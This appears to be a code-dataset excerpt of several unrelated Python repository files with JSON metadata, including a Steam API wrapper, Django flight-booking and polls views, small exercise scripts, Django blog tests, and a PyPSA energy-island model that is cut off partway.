IsPlayingSharedGame(self, steamid, appid_playing):\n '''\n IsPlayingSharedGame returns the original owner's SteamID if a borrowing \n account is currently playing this game. If the game is not borrowed or \n the borrower currently doesn't play this game, the result is always 0.\n '''\n path = \"IPlayerService/IsPlayingSharedGame\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid_playing\": appid_playing\n }\n return self.get(path, version, params)\n\n # GetSchemaForGame (v2)\n def GetSchemaForGame(self, appid):\n '''\n GetSchemaForGame returns gamename, gameversion and availablegamestats\n (achievements and stats).\n '''\n path = \"ISteamUserStats/GetSchemaForGame\"\n version = \"v2\"\n params = {\n \"key\": self.apikey,\n \"appid\": appid,\n }\n return self.get(path, version, params)\n\n # GetPlayerBans (v1)\n def GetPlayerBans(self, steamids):\n '''\n GetPlayerBans returns Community, VAC, and Economy ban statuses for \n given players.\n '''\n path = \"ISteamUser/GetPlayerBans\"\n version = \"v1\"\n params = {\n \"key\": self.apikey,\n \"steamids\": steamids,\n }\n return self.get(path, version, params)","repo_name":"rgooler/steam-game-stat-tracker","sub_path":"steamgamestattracker/steamapi.py","file_name":"steamapi.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25054370252","text":"from django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect, render\n\nfrom django.urls import reverse\nfrom flight_booking.models import *\nfrom datetime import datetime\nfrom django.contrib import messages\n\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.forms.models import model_to_dict\nfrom django.db.models import Max\nfrom django.shortcuts import render, HttpResponse, HttpResponseRedirect\n\n# ----------------Home page (search)------------------------------------\ndef search(request):\n city = City.objects.all()\n min_date = f\"{datetime.now().date().year}-{datetime.now().date().month}-{datetime.now().date().day}\"\n max_date = f\"{datetime.now().date().year if (datetime.now().date().month+3)<=12 else datetime.now().date().year+1}-{(datetime.now().date().month + 3) if (datetime.now().date().month+3)<=12 else (datetime.now().date().month+3-12)}-{datetime.now().date().day}\"\n if request.method == 'POST':\n departure = request.POST.get('departure')\n destination = request.POST.get('destination')\n departure_date = reFormatDateMMDDYYYY(\n request.POST.get('departure_date'))\n seat_class = request.POST.get('seat_class')\n return render(request, 'search.html', {\n 'departure': departure,\n 'destination': destination,\n 'departure_date': departure_date,\n 'seat_class': seat_class,\n 'city': city\n })\n\n else:\n return render(request, \"search.html\", {\n 'min_date': min_date,\n 'max_date': max_date,\n 'city': city\n })\n\n#-------------------------Get data from search page and go to View flight page--------------\n\ndef flight_view(request):\n if request.method=='GET':\n departure = request.GET.get('departure')\n destination = request.GET.get('destination')\n seat_class = request.GET.get('seat_class')\n date = request.GET.get('departure_date')\n departure_date = reFormatDateMMDDYYYY(request.GET.get('departure_date'))\n \n try:\n # print(\"try to check if departure date is exist in database\")\n flights = Flight.objects.select_related(\"flight_id\",\"flight_detail\").filter(path_id__departure = departure,\n path_id__destination=destination,flight_id__seat_class=seat_class,\n flight_detail__departure_date=date)\n \n city_a = City_A.objects.filter(city_id=departure)\n city_b = City_B.objects.filter(city_id=destination)\n except:\n print(\"ERROR!\")\n return redirect('/searchflight')\n else:\n \n return render(request,'view.html',{\n 'flights' : flights,\n 'departure' : city_a[0] ,\n 'destination' : city_b[0],\n 'seat_class' : seat_class,\n 'departure_date': departure_date,\n 'date' : date\n })\n else: \n print('ERROR!')\n return redirect('/')\n\n#---------------view flight page ------------------\ndef viewflight(request):\n return render(request, 'view.html')\n\n#------------register and login form------------------\ndef registerForm(request):\n return render(request, 'register.html')\n\n\ndef loginform(request):\n return render(request, 'loginform.html')\n\n# --------------Add new user (from register page) to database--------------------------\n\ndef addUser(request):\n Firstname = request.POST['Firstname']\n Lastname = request.POST['Lastname']\n email = request.POST['email']\n username = request.POST['username']\n password = request.POST['password']\n repassword = request.POST['repassword']\n\n if password == repassword:\n if User.objects.filter(username=username).exists():\n messages.info(request, \"This Username is already used.\")\n return redirect('/register')\n elif User.objects.filter(email=email).exists():\n messages.info(request, \"This email is already used.\")\n return redirect('/register')\n\n else:\n user = User.objects.create_user(\n username=username,\n email=email,\n password=password,\n first_name=Firstname,\n last_name=Lastname\n )\n user.save()\n return redirect('/login')\n else:\n messages.info(request, \"Password doesn't match.\")\n return redirect('/register')\n\n#---------------authenticate user and login--------------------\n\ndef login(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return redirect('/')\n else:\n messages.error(request, \"Incorrect Username/Password\")\n return redirect('/loginform')\n else:\n return render(request, 'loginform.html')\n\n#--------------Logout----------------------------\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\n# --------------------Get details from view page (when you choose any flight)-------------------------------\n\ndef booking(request,fid,path,date,seat_class):\n\n booking_detail = Flight.objects.select_related(\"flight_detail\",\"flight_id\",\"path_id\").get(flight_id=fid,flight_detail__departure_date=date, \n flight_id__seat_class=seat_class,path_id=path)\n duration = booking_detail.duration\n path_id = Travel.objects.filter(path_id=path)\n depart_detail = City_A.objects.filter(city_id=path_id[0].departure)\n desti_detail = City_B.objects.filter(city_id=path_id[0].destination)\n date = reFormatDateMMDDYYYY(date)\n return render(request,'booking.html',{\n 'booking_detail' : booking_detail,\n 'departure_date' : date,\n 'departure' : depart_detail,\n 'destination' : desti_detail,\n 'duration' : duration\n })\n\n\n#--------------Add passenger (fill in booking page) after press proceed to payment button---------------\n\ndef addPassenger(request):\n if request.method == 'POST':\n flight_id = request.POST['flight_id']\n departure_date = request.POST['departure_date']\n seat_class = request.POST['seat_class']\n total_amount = reFormatNumber(request.POST['total_amount'])\n username = request.POST['username']\n passengerscount = request.POST['passengersCount']\n ticket = createticket(flight_id,departure_date,seat_class,total_amount,username)\n for i in range(1, int(passengerscount)+1): \n if Passenger.objects.count() != 0:\n id_max = Passenger.objects.aggregate(Max('id'))['id__max']\n next_id = str(int(id_max)+1)\n else:\n next_id = \"0\"\n id = next_id \n fname = request.POST[f'fname{i}']\n lname = request.POST[f'lname{i}']\n email = request.POST[f'email{i}']\n phone = request.POST[f'phone{i}']\n id_no = request.POST[f'idno{i}']\n passenger = Passenger.objects.create(\n id=id,\n first_name=fname, \n last_name=lname, \n email=email,\n phone_no=phone,\n id_no=id_no,\n ticket_id=ticket,\n )\n passenger.save()\n ticket_id = ticket.ticket_id\n print('ticket:',ticket_id)\n\n return render(request,'payment.html',{\n 'ticket_id':ticket_id,\n 'total_amount':total_amount\n })\n \n else:\n return redirect('/')\n\n\n#-----------in Payment page and response to congratulation page------------------------------------\n\ndef confirm(request):\n if request.method == 'POST':\n ticket_id = request.POST.get('ticket_id')\n try:\n ticket = Ticket.objects.get(ticket_id=ticket_id)\n ticket.status = 'CONFIRMED'\n ticket.booking_date = datetime.now()\n ticket.save()\n return render(request,'confirm.html',{\n 'ticket_id': ticket_id\n })\n except Exception as e:\n return HttpResponse(e)\n else:\n return HttpResponse(\"Method must be post.\")\n\n\n#--------------------create E-ticket, ticket in my booking page and save to database----------------------------------------------------\n\ndef createticket(flight_id,departure_date,seat_class,total_amount,username):\n \n if Ticket.objects.count() != 0:\n ticket_id_max = Ticket.objects.aggregate(Max('ticket_id'))['ticket_id__max']\n next_ticket_id = ticket_id_max[0:2] + str(int(ticket_id_max[2:5])+1)\n else:\n next_ticket_id = \"TK100\"\n\n status = False\n if status == True:\n status = 'CONFIRMED'\n else: \n status = 'PENDING'\n\n ticket_id = next_ticket_id\n date = reFormatDateYYYYMMDD(departure_date)\n\n print(ticket_id,flight_id,date,seat_class,status)\n ticket = Ticket.objects.create(\n ticket_id=ticket_id,\n flight_id_id=flight_id,\n departure_date=date,\n seat_class=seat_class,\n status=status,\n total_amount=total_amount,\n username =username\n )\n\n ticket.save()\n\n return ticket\n\n#---------------my booking page ---------------\ndef my_booking(request):\n tickets = Ticket.objects.filter(username=request.user.username).order_by('-ticket_id').values('ticket_id','flight_id','departure_date',\n 'seat_class','total_amount','booking_date','status')\n return render(request, 'my_booking.html', {\n 'tickets': tickets,\n })\n\n#----------------------resume pay booking (link to payment's path )--------------------\n\ndef resume_booking(request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n ticket_id = request.POST['ticket_id']\n ticket = Ticket.objects.get(ticket_id=ticket_id)\n if ticket.username == request.user.username:\n return render(request, \"payment.html\", {\n 'total_amount': ticket.total_amount,\n 'ticket_id': ticket.ticket_id\n })\n else:\n return HttpResponse(\"User unauthorised\")\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n else:\n return HttpResponse(\"Method must be post.\")\n\n#------------Cancle ticket and update status of ticket --------------------\n\n@csrf_exempt\ndef cancel_ticket(request):\n if request.method == 'POST':\n if request.user.is_authenticated:\n ticket_id = request.POST['ticket_id']\n try:\n ticket = Ticket.objects.get(ticket_id=ticket_id)\n if ticket.username == request.user.username:\n ticket.status = 'CANCELLED'\n ticket.save()\n return JsonResponse({'success': True})\n # return redirect('/my_booking')\n else:\n return JsonResponse({\n 'success': False,\n 'error': \"User unauthorised\"\n })\n except Exception as e:\n return JsonResponse({\n 'success': False,\n 'error': e\n })\n else:\n return HttpResponse(\"User unauthorised\")\n else:\n return HttpResponse(\"Method must be POST.\")\n\n\n# -----------------this part is used for ticket details ------------------------------------------------\n\nclass TicketPDF(View):\n def get(self, request, pk):\n ticket_id = pk\n\n ticket = list(Ticket.objects.filter(ticket_id=ticket_id).values('ticket_id','flight_id','departure_date','seat_class','status','username','booking_date'))\n passenger = list(Passenger.objects.filter(ticket_id=ticket_id).order_by('id_no').values(\"id_no\",\"ticket_id\",\"first_name\",\"last_name\",\"phone_no\",\"email\"))\n flight_id = ticket[0]['flight_id']\n flight_detail = list(Flight.objects.select_related(\"flight_detail\",\"flight_id\",\"path_id\").filter(flight_id=flight_id).values(\n 'flight_id','airline','path_id__departure','path_id__destination','departure_time',\n 'arrival_time','duration'))\n departure_code = flight_detail[0]['path_id__departure']\n destination_code = flight_detail[0]['path_id__destination']\n departure = list(City_A.objects.filter(city_id=departure_code).values('city_id','city_name','airport'))\n destination = list(City_B.objects.filter(city_id=destination_code).values('city_id','city_name','airport'))\n\n data = dict()\n data['ticket'] = ticket[0]\n data['passenger'] = passenger\n data['flight_detail'] = flight_detail[0]\n data['departure'] = departure[0]\n data['destination'] = destination[0]\n\n # return JsonResponse(data)\n return render(request, 'ticket.html', data)\n\n#--------------Reformat anything----------------\n\ndef reFormatDateMMDDYYYY(ddmmyyyy):\n if (ddmmyyyy == ''):\n return ''\n return ddmmyyyy[8:10] + \"/\" + ddmmyyyy[5:7] + \"/\" + ddmmyyyy[:4]\n\ndef reFormatDateYYYYMMDD(yyyymmdd):\n if (yyyymmdd == ''):\n return ''\n return yyyymmdd[6:10] + \"-\" + yyyymmdd[3:5] + \"-\" + yyyymmdd[:2]\n\n\ndef reFormatNumber(str):\n if (str == ''):\n return ''\n return str.replace(\",\", \"\")\n\n\ndef reFormatNumber(str):\n if (str == ''):\n return ''\n return str.replace(\",\", \"\")\n\n\n# ------------------LIST--------------------------\nclass CityList(View):\n def get(self,request):\n cities = list(City.objects.all().values())\n data = dict()\n data['cities'] = cities\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass PathList(View):\n def get(self,request):\n paths = list(Travel.objects.all().values())\n data = dict()\n data['paths'] = paths\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass PathDetail(View):\n def get(self, request, id):\n path = list(Travel.objects.select_related(\"city\").filter(path_id=id).values('path_id','departure__city_name','destination__city_name','departure__airport','destination__airport'))\n path_detail = list(Flight.objects.select_related(\"flight_id\").filter(path_id=id).values('flight_id','airline','departure_time','arrival_time','path_id__departure','path_id__destination','flight_id__seat_class'))\n data = dict()\n data['path'] = path[0]\n data['path_detail'] = path_detail\n\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n\nclass ClassList(View):\n def get(self, request):\n seat_classes = list(FlightClass.objects.all().values())\n data = dict()\n data['seat_classes'] = seat_classes\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass ClassDetail(View):\n def get(self, request, pk):\n seat_class = get_object_or_404(FlightClass, pk=pk)\n data = dict()\n data['seat_classes'] = model_to_dict(seat_class)\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n# ----------------------------------------------------------- \n\nclass FlightList(View):\n def get(self, request):\n flights = list(Flight.objects.order_by('flight_id').all().values())\n data = dict()\n data['flights'] = flights\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\nclass FlightDetail(View):\n def get(self, request, id):\n flight = list(Flight.objects.select_related(\"flightclass\",\"travel\").filter(flight_id=id).values('flight_id','airline','departure_time','arrival_time','path_id__departure','path_id__destination','flight_id__seat_class', 'flight_id__price'))\n flight_detail = list(Flight_Detail.objects.select_related(\"flight_id\").filter(flight_id=id).values('flight_id','departure_date','gate_no'))\n data = dict()\n data['flight'] = flight[0]\n data['flight_detail'] = flight_detail\n\n response = JsonResponse(data)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n\n","repo_name":"NopKorawit/Flight4U_CPE327_CPE231_project","sub_path":"flight_booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12658115907","text":"from colors import color\n\n\ndef get_int(message):\n while True:\n try:\n n = int(input(message))\n except:\n print(color('Digite um numero interio valido', 'red'))\n else:\n return n\n\n\ndef get_programador(programadores):\n while True:\n i = 1\n for p in programadores:\n print(color(f'{i} - {p}', 'green'))\n i += 1\n\n try:\n if len(programadores) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n p = programadores[n]\n except:\n print(color('Programador não válido! Tente novamente', 'red'))\n else:\n programadores.remove(p)\n return p\n\n\ndef get_linguagem(linguagens):\n while True:\n i = 1\n for l in linguagens:\n print(color(f'{i} - {l}', 'green'))\n i += 1\n\n try:\n if len(linguagens) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n l = linguagens[n]\n except:\n print(color('Linguagem não válido! Tente novamente', 'red'))\n else:\n linguagens.remove(l)\n return l\n\ndef get_framework_front(framework_front):\n while True:\n i = 1\n for f in framework_front:\n print(color(f'{i} - {f}', 'green'))\n i += 1\n\n try:\n if len(framework_front) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n f = framework_front[n]\n except:\n print(color('Framework Frontend não válido! Tente novamente', 'red'))\n else:\n framework_front.remove(f)\n return f\n\ndef get_banco_de_dados(banco_de_dados):\n while True:\n i = 1\n for b in banco_de_dados:\n print(color(f'{i} - {b}', 'green'))\n i += 1\n\n try:\n if len(banco_de_dados) > 1:\n n = get_int(color('Escollha um programador: ', 'blue')) - 1\n else:\n n = 0\n b = banco_de_dados[n]\n except:\n print(color('Banco de dados não válido! Tente novamente', 'red'))\n else:\n banco_de_dados.remove(b)\n return b\n\n\ndef valida_dados(vagas):\n for dado in vagas:\n\n if dado['programador'] == 'Nicole' and dado['framework_frontend'] == 'Vue':\n return False\n\n if dado['linguagem'] == 'Java' and dado['banco_de_dados'] != 'PostgreSQL':\n return False\n\n if dado['linguagem'] == 'Angular' and dado['banco_de_dados'] != 'MongoDb':\n return False\n\n if dado['programador'] == 'Mateus' and dado['linguagem'] != 'Python':\n return False\n\n if dado['programador'] == 'Mateus' and dado['banco_de_dados'] == 'MySqlServer':\n return False\n\n if dado['programador'] == 'Tiago' and dado['linguagem'] == 'PHP':\n return False\n\n return True\n\n\n\n\n\n\n\n\n\n","repo_name":"yurihartmann/learning_python","sub_path":"HB_Squads/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42716348072","text":"import numpy as np\nfrom PIL import Image\n\ndef open_gif_image(path):\n img = Image.open(path).convert('RGB')\n\n # get dimensions of image\n dimensions = img.size\n\n # height, width, number of channels in image\n height = dimensions[0]\n width = dimensions[1]\n channels = len(img.getbands())\n\n # Print Information\n print(\"Image Height: {height}; Width: {width}; Channels: {channels}\")\n return np.array(img)\n\nprint(open_gif_image(\"primeira-gif.gif\"))","repo_name":"larissajusten/image-processing","sub_path":"gif-function/gif-function.py","file_name":"gif-function.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19298722426","text":"\n\ndef MySubmittedSolution(A):\n # write your code in Python 3.6\n N = len(A)\n shadow_table = [False for i in range(N+1)]\n shadow_table[0] = True\n consecutive_on = 0\n ons = 0\n for index in A:\n shadow_table[index] = True\n if shadow_table[index-1] == True and consecutive_on==index-1:\n ons += 1\n while consecutive_on < N-1 and shadow_table[consecutive_on+1]:\n consecutive_on += 1\n return ons\n\n\ndef solution(A):\n rightMostVal = -1\n count = 0\n N = len(A)\n for i in range(N):\n if A[i] > rightMostVal:\n rightMostVal = A[i]\n if rightMostVal == i+1:\n count += 1\n return count\n\nA = [2,1,3,5,4]\nprint(solution(A))\n\nB = [5,2,3,1,4]\nprint(solution(B))","repo_name":"apoorva9s14/pythonbasics","sub_path":"CompetetiveProblems/CodilityProblems/codilityBulbSwitch.py","file_name":"codilityBulbSwitch.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"25014558159","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, response, Http404, HttpResponseRedirect\n\n# Create your views here.\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom polls.models import Question, Choice\n\n\ndef index(request):\n '''\n 首页展示所有问题\n :param request:\n :return:\n '''\n # latest_question_list2 = Question.objects.order_by('-pub_data')[:2]\n latest_question_list = Question.objects.all()\n context = {'latest_question_list': latest_question_list}\n return render(request, 'polls/index.html', context)\n\ndef detail(request, question_id):\n '''\n 查看所有w问题\n :param request:\n :param question_id:\n :return:\n '''\n question = get_object_or_404(Question)\n return render(request, 'polls/detail.html', {'question':question})\n\ndef results(request, question_id):\n '''\n 查看投票结果\n :param request:\n :param question_id:\n :return:\n '''\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question':question})\n\ndef vote(request, question_id):\n p = get_object_or_404(Question, pk=question_id)\n try:\n selected_choice = p.choice_set.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n # Redisplay the question voting form.\n return render(request, 'polls/detail.html', {\n 'question': p,\n 'error_message': \"你没有做出选择!\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.save()\n return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))","repo_name":"ShaoLay/Vote_DJango","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30675722427","text":"from classes.player import Player\nfrom classes import *\nimport random\n\nclass Game:\n def __init__(self, name):\n self.name = name\n\n def play_game(self, player1, player2):\n player1choice = player1.choice.lower()\n player2choice = player2.choice.lower()\n\n if player1choice == \"rock\" and player2choice == \"scissors\":\n return player1\n elif player1choice == \"scissors\" and player2choice == \"paper\":\n return player1\n elif player1choice == \"paper\" and player2choice == \"rock\":\n return player1\n elif player1choice == \"rock\" and player2choice == \"paper\":\n return player2\n elif player1choice == \"scissors\" and player2choice == \"rock\":\n return player2\n elif player1choice == \"paper\" and player2choice == \"scissors\":\n return player2\n elif player1choice == player2choice:\n return \"Draw\"\n\n def get_computer_choice(self):\n availableChoice = [\"rock\", \"paper\", \"scissors\"]\n return random.choice(availableChoice)","repo_name":"dephrase/rock_paper_scissors_homework","sub_path":"classes/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"46854716578","text":"from djangae.contrib.gauth.backends import AppEngineUserAPI\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.db.utils import IntegrityError\nfrom django.http.response import HttpResponse\nfrom django.template import Template, Context\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\n\nfrom blog.dashboard.decorators import has_permission_level, login_required\nfrom blog.dashboard.models import SiteConfiguration\nfrom blog.utils import ROLE_CHOICES\nfrom google.appengine.api import users\n\n\nclass DecoratorTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.backend = AppEngineUserAPI()\n\n self.anonymouse_user = AnonymousUser()\n\n self.administrator_user = get_user_model().objects.create(\n username='000000000000000000001',\n email='1@example.com',\n role=ROLE_CHOICES['Administrator']\n )\n self.editor_user = get_user_model().objects.create(\n username='000000000000000000002',\n email='2@example.com',\n role=ROLE_CHOICES['Editor']\n )\n self.author_user = get_user_model().objects.create(\n username='000000000000000000003',\n email='3@example.com',\n role=ROLE_CHOICES['Author']\n )\n self.contributor_user = get_user_model().objects.create(\n username='000000000000000000004',\n email='4@example.com',\n role=ROLE_CHOICES['Contributor']\n )\n self.follower = get_user_model().objects.create(\n username='000000000000000000005',\n email='5@example.com',\n role=ROLE_CHOICES['Follower']\n )\n\n def test_login_required_decorator(self):\n @login_required\n def a_view(request):\n return HttpResponse()\n\n def do_request(user):\n request = self.factory.get('/rand')\n request.user = user\n return a_view(request)\n\n self.assertEqual(do_request(self.anonymouse_user).status_code, 302)\n self.assertEqual(do_request(self.follower).status_code, 200)\n\n def do_request(self, user, required_level):\n @has_permission_level(required_level)\n def a_view(request):\n return HttpResponse()\n\n request = self.factory.get('/rand')\n request.user = user\n return a_view(request)\n\n def test_has_permission_level_decorator(self):\n self.assertEqual(\n self.do_request(self.administrator_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.author_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Contributor').status_code, 200)\n self.assertEqual(\n self.do_request(self.follower, 'Contributor').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.author_user, 'Author').status_code, 200)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Author').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Author').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Editor').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Editor').status_code, 200)\n self.assertEqual(\n self.do_request(self.author_user, 'Editor').status_code, 302)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Editor').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Editor').status_code, 302)\n\n self.assertEqual(\n self.do_request(self.administrator_user, 'Administrator').status_code, 200)\n self.assertEqual(\n self.do_request(self.editor_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.author_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.contributor_user, 'Administrator').status_code, 302)\n self.assertEqual(\n self.do_request(self.follower, 'Administrator').status_code, 302)\n\n\nclass SingletonModelTests(TestCase):\n\n def test_autocreate(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n config = SiteConfiguration.get_global()\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n\n def test_singleton(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n config = SiteConfiguration.objects.create(site_name='Blog')\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n with self.assertRaises(IntegrityError):\n config2 = SiteConfiguration.objects.create(site_name='Blog 2')\n self.assertEqual(SiteConfiguration.objects.count(), 1)\n config3 = SiteConfiguration.get_global()\n self.assertEqual(config.pk, config3.pk)\n\n def test_get_global_model_tag(self):\n self.assertEqual(SiteConfiguration.objects.count(), 0)\n site_name = 'Blog'\n SiteConfiguration.objects.create(site_name=site_name)\n out = Template(\n \"{% load global_settings_extras %}\"\n \"{% get_global_model 'dashboard.SiteConfiguration' as site_config %}\"\n \"{{ site_config.site_name }}\"\n ).render(Context())\n self.assertEqual(site_name, out)\n","repo_name":"iago1460/lightweight-django-blog","sub_path":"blog/dashboard/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"24157744745","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 09:29:02 2023\n\n@author: lukas\n\"\"\"\n\nimport os\nimport sys\n# Add modules folder to path\nsys.path.append(os.path.abspath('../../modules')) \n\nimport pypsa\nfrom pypsa.linopt import get_var, linexpr, join_exprs, define_constraints, get_dual, get_con, write_objective, get_sol, define_variables\nimport pandas as pd\n\nimport gorm_v1 as gm\nimport pypsa_diagrams as pdiag\n\nimport matplotlib.pyplot as plt\nimport island_plt as ip\nip.set_plot_options()\n\n#%% ------- CONTROL -----------------------------------\n\n# Main control\nshould_solve = True\nshould_plot = True\nshould_bus_diagram = False\nshould_n_diagram = True\n\n# Main parameters\nyear = 2030 # Choose year\nr = 0.07 # Discount rate\nwind_cap = 3000 # [MW] Installed wind capacity\nn_hrs = 8760 # [hrs] Choose number of hours to simulate\nisland_area = 120_000*0.6 # [m^2] total island area\n\nlink_efficiency = 0.95 # Efficiency of links\nlink_total_max = wind_cap # Total allowed link capacity\nlink_p_nom_min = 0 # Minimum allowed capacity for one link\nlink_limit = float('inf') # [MW] Limit links to countries. float('inf')\n\nfilename = \"network_1_\" # Choose filename for export\n\n# Choose which countries to include of this list, comment unwanted out.\nconnected_countries = [\n \"Denmark\", \n \"Norway\", \n \"Germany\", \n \"Netherlands\", \n \"Belgium\", \n \"United Kingdom\"\n ]\n\njiggle = [0, 0]\n\n# Component control\nadd_storage = True # Add storage on island\nadd_data = True # Add datacenter on island\nadd_hydrogen= True # Add hydrogen production on island\nadd_c_gens = True # Add country generators\nadd_c_loads = True # Add country demand\n\n#%% ------- IMPORT DATA -----------------------------------\n\n# ----- Wind capacity factor data ---------\nwind_cf = pd.read_csv(r'data\\wind_formatted.csv',\n index_col = [0], sep=\",\")[:n_hrs]\n\n# ----- Country demand and price ---------\n# Import price and demand for each country for the year, and remove outliers\ncprice, cload = gm.get_load_and_price(year, connected_countries, n_std = 1)\n\n# ----- Dataframe with bus data ---------\n# Get dataframe with bus info, only for the connected countries.\nbus_df = gm.get_bus_df(connected_countries) # Import country data for linking\ncountry_df = bus_df[1:].copy() \n\n# ----- Dataframe with tech data ---------\ntech_df = gm.get_tech_data(year, r)\n\n# ----- Area use data ---------\narea_use = gm.get_area_use()\n\n#%% ------- NETWORK -----------------------------------------------------------\n\n# ----- initialize network ---------\nn = pypsa.Network()\nt = pd.date_range('2030-01-01 00:00', '2030-12-31 23:00', freq = 'H')[:n_hrs]\nn.set_snapshots(t)\n\n# Add data to network for easier access when creating constraints\nn.bus_df = bus_df\nn.area_use = area_use\nn.total_area = island_area \nn.link_total_max = link_total_max\nn.link_p_nom_min = link_p_nom_min\n\n# ----- Add buses-------------------\n# Add multiple buses by passing arrays from bus_df to parameters and using madd\nn.madd('Bus',\n names = bus_df['Bus name'], \n x = bus_df['X'].values,\n y = bus_df['Y'].values,\n )\n\n# ----- Add links--------------------\nfor country in country_df['Bus name']:\n \n # Get link distance in [km]\n distance = gm.get_earth_distance(bus_df.loc['Energy Island']['X'],\n country_df.loc[country]['X'],\n bus_df.loc['Energy Island']['Y'],\n country_df.loc[country]['Y'])\n \n # Add bidirectional link with loss and marginal cost\n gm.add_bi_link(n,\n bus0 = bus_df.loc['Energy Island']['Bus name'], # From Energy island\n bus1 = country, # To country bus\n link_name = \"Island to \" + country, # Link name\n efficiency = link_efficiency,\n capital_cost = tech_df['capital cost']['link'] * distance,\n marginal_cost = tech_df['marginal cost']['link'],\n carrier = 'DC',\n p_nom_extendable = True,\n p_nom_max = link_limit, # [MW]\n p_nom_min = link_p_nom_min,\n bus_shift = jiggle,\n )\n \n# Add list of main links to network to differetniate\nn.main_links = n.links[~n.links.index.str.contains(\"bus\")].index\n\n### COUNTRIES ###\n# ----- Add generators for countries--------------------\n#Add generators to each country bus with varying marginal costs\nif add_c_gens:\n for country in country_df['Bus name']:\n n.add('Generator',\n name = \"Gen \" + country,\n bus = country,\n capital_cost = 0,\n marginal_cost = cprice[country_df.loc[country]['Abbreviation']].values,\n p_nom_extendable = True\n )\n \n# ----- Add loads for countries--------------------\n# Add loads to each country bus\nif add_c_loads:\n for country in country_df['Bus name']:\n n.add('Load',\n name = \"Load \" + country,\n bus = country,\n p_set = cload[country_df.loc[country]['Abbreviation']].values,\n ) \n\n### ISLAND ###\n# ----- Add wind generator --------------------\nn.add(\"Generator\",\n \"Wind\",\n bus = bus_df.loc['Energy Island']['Bus name'], # Add to island bus\n carrier = \"wind\",\n p_nom_extendable = True,\n p_nom_min = wind_cap, # Ensure that capacity is pre-built\n p_nom_max = wind_cap, # Ensure that capacity is pre-built\n p_max_pu = wind_cf['electricity'].values,\n # capital_cost = tech_df['capital cost']['wind turbine'],\n marginal_cost = tech_df['marginal cost']['wind turbine'],\n )\n\n# ----- Add battery storage 